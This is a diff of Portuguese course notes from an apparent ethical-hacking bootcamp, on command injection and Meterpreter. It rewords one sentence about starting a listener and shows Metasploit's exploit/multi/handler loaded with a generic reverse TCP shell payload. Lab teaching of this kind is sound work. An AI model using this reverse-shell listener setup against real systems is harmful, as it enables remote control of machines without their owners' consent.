ops-shadow/Complete-Ethical-Hacking-Bootcamp/7 - websites/06 - Command injection & meterpreter.md

 ## Execução do ataque

 ### Passo 1 - iniciar a escuta
-Iniciamos a escuta informando o IP e a porta de escuta (a  mesma do payload)
+Iniciamos a escuta informando o IP e a porta de escuta (a  mesma do payload), e o payload
 ```
 msf > use exploit/multi/handler
 [*] Using configured payload generic/shell_reverse_tcp